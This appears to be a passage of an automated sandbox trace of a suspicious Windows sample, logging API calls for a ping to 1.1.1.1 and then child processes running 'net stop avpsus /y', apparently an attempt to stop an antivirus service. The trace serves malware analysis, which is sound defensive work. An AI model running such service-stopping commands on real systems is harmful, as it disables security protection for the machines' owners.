_fileno (_File=0x76952628) returned 1 [0047.126] _get_osfhandle (_FileHandle=1) returned 0x90 [0047.126] GetFileType (hFile=0x90) returned 0x2 [0047.126] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x292f504 | out: lpMode=0x292f504) returned 0 [0047.126] GetLastError () returned 0x6 [0047.126] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x292f464, nSize=0x50 | out: lpBuffer="\x02") returned 0x0 [0047.126] _fileno (_File=0x76952628) returned 1 [0047.126] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0047.126] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 1.1.1.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0047.126] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x2d88660 [0047.126] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 1.1.1.1 ", cchWideChar=-1, lpMultiByteStr=0x2d88660, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 1.1.1.1 ", lpUsedDefaultChar=0x0) returned 19 [0047.126] _fileno (_File=0x76952628) returned 1 [0047.127] _write (in: _FileHandle=1, _Buf=0x2d88660*, _MaxCharCount=0x12 | out: _Buf=0x2d88660*) returned 18 [0047.127] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.127] _fileno (_File=0x76952628) returned 1 [0047.127] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0047.127] LocalFree (hMem=0x2d88660) returned 0x0 [0047.127] LocalFree (hMem=0x2d8a170) returned 0x0 [0047.127] __iob_func () returned 0x76952608 [0047.127] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x292f538, nSize=0x0, Arguments=0x292f534 | out: lpBuffer="ꅰ˘$ʒ⡲?☨皕❚") returned 0x18 [0047.127] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.127] _fileno (_File=0x76952628) returned 1 [0047.127] _get_osfhandle (_FileHandle=1) returned 0x90 [0047.127] GetFileType (hFile=0x90) returned 0x2 [0047.127] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x292f504 | out: lpMode=0x292f504) returned 0 [0047.127] GetLastError () returned 0x6 [0047.127] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x292f464, nSize=0x50 | out: lpBuffer="\x02") returned 0x0 [0047.127] _fileno (_File=0x76952628) returned 1 [0047.127] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0047.127] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0047.127] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x2d7d5e0 [0047.127] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x2d7d5e0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0047.127] _fileno (_File=0x76952628) returned 1 [0047.127] _write (in: _FileHandle=1, _Buf=0x2d7d5e0*, _MaxCharCount=0x18 | out: _Buf=0x2d7d5e0*) returned 24 [0047.127] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.127] _fileno (_File=0x76952628) returned 1 [0047.127] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0047.127] LocalFree (hMem=0x2d7d5e0) returned 0x0 [0047.127] LocalFree (hMem=0x2d8a170) returned 0x0 [0047.127] SetConsoleCtrlHandler (HandlerRoutine=0x3f1c70, Add=1) returned 1 [0047.127] IcmpSendEcho2Ex (in: IcmpHandle=0x2d740a0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x1010101, RequestData=0x2d7d658, RequestSize=0x20, RequestOptions=0x292f5b0, ReplyBuffer=0x2d85c70, ReplySize=0x1ff8, Timeout=0xbb8 | out: ReplyBuffer=0x2d85c70) returned 0x1 [0047.202] InetNtopW (in: Family=2, pAddr=0x292f590, pStringBuf=0x292f6c4, StringBufSize=0x16 | out: pStringBuf="1.1.1.1") returned="1.1.1.1" [0047.202] __iob_func () returned 0x76952608 [0047.202] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x292f538, nSize=0x0, Arguments=0x292f534 | out: lpBuffer="ꅰ˘$ʒ⦙?☨皕✣") returned 0x14 [0047.202] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.202] _fileno (_File=0x76952628) returned 1 [0047.202] _get_osfhandle (_FileHandle=1) returned 0x90 [0047.202] GetFileType (hFile=0x90) returned 0x2 [0047.202] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x292f504 | out: lpMode=0x292f504) returned 0 [0047.202] GetLastError () returned 0x6 [0047.202] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x292f464, nSize=0x50 | out: lpBuffer="\x02") returned 0x0 [0047.202] _fileno (_File=0x76952628) returned 1 [0047.202] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0047.202] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 1.1.1.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0047.202] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x2d87d00 [0047.202] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 1.1.1.1: ", cchWideChar=-1, lpMultiByteStr=0x2d87d00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 1.1.1.1: ", lpUsedDefaultChar=0x0) returned 21 [0047.202] _fileno (_File=0x76952628) returned 1 [0047.202] _write (in: _FileHandle=1, _Buf=0x2d87d00*, _MaxCharCount=0x14 | out: _Buf=0x2d87d00*) returned 20 [0047.202] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.202] _fileno (_File=0x76952628) returned 1 [0047.202] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0047.202] LocalFree (hMem=0x2d87d00) returned 0x0 [0047.202] LocalFree (hMem=0x2d8a170) returned 0x0 [0047.203] __iob_func () returned 0x76952608 [0047.203] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x292f538, nSize=0x0, Arguments=0x292f534 | out: lpBuffer="袀˘$ʒ⧃?☨皕✼") returned 0x9 [0047.203] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.203] _fileno (_File=0x76952628) returned 1 [0047.203] _get_osfhandle (_FileHandle=1) returned 0x90 [0047.203] GetFileType (hFile=0x90) returned 0x2 [0047.203] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x292f504 | out: lpMode=0x292f504) returned 0 [0047.203] GetLastError () returned 0x6 [0047.203] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x292f464, nSize=0x50 | out: lpBuffer="\x02") returned 0x0 [0047.203] _fileno (_File=0x76952628) returned 1 [0047.203] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0047.203] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0047.203] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x2d7e7b0 [0047.203] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x2d7e7b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0047.203] _fileno (_File=0x76952628) returned 1 [0047.203] _write (in: _FileHandle=1, _Buf=0x2d7e7b0*, _MaxCharCount=0x9 | out: _Buf=0x2d7e7b0*) returned 9 [0047.203] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.203] _fileno (_File=0x76952628) returned 1 [0047.203] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0047.203] LocalFree (hMem=0x2d7e7b0) returned 0x0 [0047.203] LocalFree (hMem=0x2d88880) returned 0x0 [0047.203] __iob_func () returned 0x76952608 [0047.203] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0x292f538, nSize=0x0, Arguments=0x292f534 | out: lpBuffer="ꅰ˘$ʒ⩃?☨皕✦") returned 0xa [0047.203] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.203] _fileno (_File=0x76952628) returned 1 [0047.203] _get_osfhandle (_FileHandle=1) returned 0x90 [0047.203] GetFileType (hFile=0x90) returned 0x2 [0047.203] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x292f504 | out: lpMode=0x292f504) returned 0 [0047.203] GetLastError () returned 0x6 [0047.203] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x292f464, nSize=0x50 | out: lpBuffer="\x02") returned 0x0 [0047.203] _fileno (_File=0x76952628) returned 1 [0047.203] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0047.203] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time=26ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0047.203] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x2d7e7c8 [0047.203] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time=26ms ", cchWideChar=-1, lpMultiByteStr=0x2d7e7c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time=26ms ", lpUsedDefaultChar=0x0) returned 11 [0047.204] _fileno (_File=0x76952628) returned 1 [0047.204] _write (in: _FileHandle=1, _Buf=0x2d7e7c8*, _MaxCharCount=0xa | out: _Buf=0x2d7e7c8*) returned 10 [0047.204] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.204] _fileno (_File=0x76952628) returned 1 [0047.204] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0047.204] LocalFree (hMem=0x2d7e7c8) returned 0x0 [0047.204] LocalFree (hMem=0x2d8a170) returned 0x0 [0047.204] __iob_func () returned 0x76952608 [0047.204] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x292f538, nSize=0x0, Arguments=0x292f534 | out: lpBuffer="蝐˘$ʒ⪝?☨皕✨") returned 0x8 [0047.204] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.204] _fileno (_File=0x76952628) returned 1 [0047.204] _get_osfhandle (_FileHandle=1) returned 0x90 [0047.204] GetFileType (hFile=0x90) returned 0x2 [0047.204] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x292f504 | out: lpMode=0x292f504) returned 0 [0047.204] GetLastError () returned 0x6 [0047.204] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x292f464, nSize=0x50 | out: lpBuffer="\x02") returned 0x0 [0047.204] _fileno (_File=0x76952628) returned 1 [0047.204] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0047.204] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=53\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0047.204] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x2d7e7b0 [0047.204] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=53\r\n", cchWideChar=-1, lpMultiByteStr=0x2d7e7b0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=53\r\n", lpUsedDefaultChar=0x0) returned 9 [0047.204] _fileno (_File=0x76952628) returned 1 [0047.204] _write (in: _FileHandle=1, _Buf=0x2d7e7b0*, _MaxCharCount=0x8 | out: _Buf=0x2d7e7b0*) returned 8 [0047.204] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.204] _fileno (_File=0x76952628) returned 1 [0047.204] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0047.204] LocalFree (hMem=0x2d7e7b0) returned 0x0 [0047.204] LocalFree (hMem=0x2d88750) returned 0x0 [0047.204] GetNameInfoW (in: pSockaddr=0x3f5440*(sa_family=2, sin_port=0x0, sin_addr="1.1.1.1"), SockaddrLength=0x10, pNodeBuffer=0x292f4c0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="1.1.1.1", pServiceBuffer=0x0) returned 0 [0047.204] __iob_func () returned 0x76952608 [0047.204] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x292f494, nSize=0x0, Arguments=0x292f490 | out: lpBuffer="ꅰ˘ʒᰨ?☨皕❏") returned 0x5a [0047.204] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.204] _fileno (_File=0x76952628) returned 1 [0047.204] _get_osfhandle (_FileHandle=1) returned 0x90 [0047.204] GetFileType (hFile=0x90) returned 0x2 [0047.205] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x292f460 | out: lpMode=0x292f460) returned 0 [0047.205] GetLastError () returned 0x6 [0047.205] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x292f3c0, nSize=0x50 | out: lpBuffer="ʒ犛眧") returned 0x0 [0047.205] _fileno (_File=0x76952628) returned 1 [0047.205] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0047.205] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 1.1.1.1:\r\n Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 91 [0047.205] LocalAlloc (uFlags=0x40, uBytes=0x5b) returned 0x2d88750 [0047.205] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 1.1.1.1:\r\n Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x2d88750, cbMultiByte=91, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 1.1.1.1:\r\n Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 91 [0047.205] _fileno (_File=0x76952628) returned 1 [0047.205] _write (in: _FileHandle=1, _Buf=0x2d88750*, _MaxCharCount=0x5a | out: _Buf=0x2d88750*) returned 90 [0047.205] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.205] _fileno (_File=0x76952628) returned 1 [0047.205] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0047.205] LocalFree (hMem=0x2d88750) returned 0x0 [0047.205] LocalFree (hMem=0x2d8a170) returned 0x0 [0047.205] __iob_func () returned 0x76952608 [0047.205] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x292f4a0, nSize=0x0, Arguments=0x292f49c | out: lpBuffer="ꅰ˘ʒᱟ?☨皕❓") returned 0x64 [0047.205] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.205] _fileno (_File=0x76952628) returned 1 [0047.205] _get_osfhandle (_FileHandle=1) returned 0x90 [0047.205] GetFileType (hFile=0x90) returned 0x2 [0047.205] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x292f46c | out: lpMode=0x292f46c) returned 0 [0047.205] GetLastError () returned 0x6 [0047.205] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x292f3cc, nSize=0x50 | out: lpBuffer="\x02") returned 0x0 [0047.205] _fileno (_File=0x76952628) returned 1 [0047.205] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0047.205] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 26ms, Maximum = 26ms, Average = 26ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 101 [0047.205] LocalAlloc (uFlags=0x40, uBytes=0x65) returned 0x2d88750 [0047.205] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 26ms, Maximum = 26ms, Average = 26ms\r\n", cchWideChar=-1, lpMultiByteStr=0x2d88750, cbMultiByte=101, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 26ms, Maximum = 26ms, Average = 26ms\r\n", lpUsedDefaultChar=0x0) returned 101 [0047.205] _fileno (_File=0x76952628) returned 1 [0047.205] _write (in: _FileHandle=1, _Buf=0x2d88750*, _MaxCharCount=0x64 | out: _Buf=0x2d88750*) returned 100 [0047.205] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0047.205] _fileno (_File=0x76952628) returned 1 [0047.205] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0047.205] LocalFree (hMem=0x2d88750) returned 0x0 [0047.206] LocalFree (hMem=0x2d8a170) returned 0x0 [0047.206] IcmpCloseHandle (IcmpHandle=0x2d740a0) returned 1 [0047.207] LocalFree (hMem=0x2d7d658) returned 0x0 [0047.207] LocalFree (hMem=0x2d85c70) returned 0x0 [0047.207] WSACleanup () returned 0 [0047.368] exit (_Code=0) Thread: id = 13 os_tid = 0xaf4 Thread: id = 14 os_tid = 0xda8 Thread: id = 15 os_tid = 0xf90 Process: id = "6" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1359b000" os_pid = "0xe20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xde0" cmd_line = "\"net.exe\" stop avpsus /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 16 os_tid = 0xe3c Thread: id = 20 os_tid = 0xfd0 Process: id = "7" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xd14b000" os_pid = "0x2ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xe20" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 17 os_tid = 0x650 Thread: id = 18 os_tid = 0xdfc Thread: id = 19 os_tid = 0xa54 Process: id = "8" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0xa7ce000" os_pid = "0x8d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xe20" cmd_line = "C:\\WINDOWS\\system32\\net1 stop avpsus /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 21 os_tid = 0x450 [0053.063] GetModuleHandleA (lpModuleName=0x0) returned 0x1220000 [0053.063] __set_app_type (_Type=0x1) [0053.063] __p__fmode () returned 0x76953c14 [0053.063] __p__commode () returned 0x769549ec [0053.063] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1226f20) returned 0x0 [0053.063] __getmainargs (in: _Argc=0x123f608, _Argv=0x123f60c, _Env=0x123f610, _DoWildCard=0, _StartInfo=0x123f61c | out: _Argc=0x123f608, _Argv=0x123f60c, _Env=0x123f610) returned 0 [0053.063] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0053.063] GetConsoleOutputCP () returned 0x1b5 [0053.065] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x1246fa0 | out: lpCPInfo=0x1246fa0) returned 1 [0053.065] SetThreadUILanguage (LangId=0x0) returned 0x3b0409 [0053.068] sprintf_s (in: _DstBuf=0x11fc58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0053.068] setlocale (category=0, locale=".437") returned="English_United States.437" [0053.069] GetStdHandle (nStdHandle=0xfffffff5) returned 0x344 [0053.069] GetStdHandle (nStdHandle=0xfffffff4) returned 0x90 [0053.069] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop avpsus /y" [0053.069] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x11fa00, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0053.069] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x60) returned 0x433da8 [0053.069] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0053.070] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x11f9fc | out: Buffer=0x11f9fc*=0x437bf8) returned 0x0 [0053.070] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x11f9f8 | out: Buffer=0x11f9f8*=0x437c10) returned 0x0 [0053.070] __iob_func () returned 0x76952608 [0053.070] _fileno (_File=0x76952608) returned 0 [0053.070] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0053.070] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0053.070] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0053.070] _wcsicmp (_String1="config", _String2="stop") returned -16 [0053.070] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0053.070] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0053.070] _wcsicmp (_String1="file", _String2="stop") returned -13 [0053.070] _wcsicmp (_String1="files", _String2="stop") returned -13 [0053.070] _wcsicmp (_String1="group", _String2="stop") returned -12 [0053.070] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0053.070] _wcsicmp (_String1="help", _String2="stop") returned -11 [0053.070] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0053.070] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0053.070] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0053.070] _wcsicmp (_String1="session", _String2="stop") returned -15 [0053.070] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0053.070] _wcsicmp (_String1=0x1221ffc, _String2="stop") returned -15 [0053.070] _wcsicmp (_String1="share", _String2="stop") returned -12 [0053.070] _wcsicmp (_String1="start", _String2="stop") returned -14 [0053.070] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0053.070] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0053.070] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0053.070] _wcsicmp (_String1="accounts", _String2="avpsus") returned -19 [0053.070] _wcsicmp (_String1="computer", _String2="avpsus") returned 2 [0053.070] _wcsicmp (_String1="config", _String2="avpsus") returned 2 [0053.070] _wcsicmp (_String1="continue", _String2="avpsus") returned 2 [0053.070] _wcsicmp (_String1="cont", _String2="avpsus") returned 2 [0053.070] _wcsicmp (_String1="file", _String2="avpsus") returned 5 [0053.070] _wcsicmp (_String1="files", _String2="avpsus") returned 5 [0053.071] _wcsicmp (_String1="group", _String2="avpsus") returned 6 [0053.071] _wcsicmp (_String1="groups", _String2="avpsus") returned 6 [0053.071] _wcsicmp (_String1="help", _String2="avpsus") returned 7 [0053.071] _wcsicmp (_String1="helpmsg", _String2="avpsus") returned 7 [0053.071] _wcsicmp (_String1="localgroup", _String2="avpsus") returned 11 [0053.071] _wcsicmp (_String1="pause", _String2="avpsus") returned 15 [0053.071] _wcsicmp (_String1="session", _String2="avpsus") returned 18 [0053.071] _wcsicmp (_String1="sessions", _String2="avpsus") returned 18 [0053.071] _wcsicmp (_String1="sess", _String2="avpsus") returned 18 [0053.071] _wcsicmp (_String1="share", _String2="avpsus") returned 18 [0053.071] _wcsicmp (_String1="start", _String2="avpsus") returned 18 [0053.071] _wcsicmp (_String1="stats", _String2="avpsus") returned 18 [0053.071] _wcsicmp (_String1="statistics", _String2="avpsus") returned 18 [0053.071] _wcsicmp (_String1="stop", _String2="avpsus") returned 18 [0053.071] _wcsicmp (_String1="time", _String2="avpsus") returned 19 [0053.071] _wcsicmp (_String1="user", _String2="avpsus") returned 20 [0053.071] _wcsicmp (_String1="users", _String2="avpsus") returned 20 [0053.071] _wcsicmp (_String1="msg", _String2="avpsus") returned 12 [0053.071] _wcsicmp (_String1="messenger", _String2="avpsus") returned 12 [0053.071] _wcsicmp (_String1="receiver", _String2="avpsus") returned 17 [0053.071] _wcsicmp (_String1="rcv", _String2="avpsus") returned 17 [0053.071] _wcsicmp (_String1="netpopup", _String2="avpsus") returned 13 [0053.071] _wcsicmp (_String1="redirector", _String2="avpsus") returned 17 [0053.071] _wcsicmp (_String1="redir", _String2="avpsus") returned 17 [0053.071] _wcsicmp (_String1="rdr", _String2="avpsus") returned 17 [0053.071] _wcsicmp (_String1="workstation", _String2="avpsus") returned 22 [0053.071] _wcsicmp (_String1="work", _String2="avpsus") returned 22 [0053.071] _wcsicmp (_String1="wksta", _String2="avpsus") returned 22 [0053.071] _wcsicmp (_String1="prdr", _String2="avpsus") returned 15 [0053.071] _wcsicmp (_String1="devrdr", _String2="avpsus") returned 3 [0053.071] _wcsicmp (_String1="lanmanworkstation", _String2="avpsus") returned 11 [0053.071] _wcsicmp (_String1="server", _String2="avpsus") returned 18 [0053.071] _wcsicmp (_String1="svr", _String2="avpsus") returned 18 [0053.071] _wcsicmp (_String1="srv", _String2="avpsus") returned 18 [0053.071] _wcsicmp (_String1="lanmanserver", _String2="avpsus") returned 11 [0053.071] _wcsicmp (_String1="alerter", _String2="avpsus") returned -10 [0053.071] _wcsicmp (_String1="netlogon", _String2="avpsus") returned 13 [0053.072] _wcsupr (in: _String="avpsus" | out: _String="AVPSUS") returned="AVPSUS" [0053.072] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x440770 [0053.075] GetServiceKeyNameW (in: hSCManager=0x440770, lpDisplayName="AVPSUS", lpServiceName=0x1248c28, lpcchBuffer=0x11f96c | out: lpServiceName="", lpcchBuffer=0x11f96c) returned 0 [0053.445] _wcsicmp (_String1="msg", _String2="AVPSUS") returned 12 [0053.445] _wcsicmp (_String1="messenger", _String2="AVPSUS") returned 12 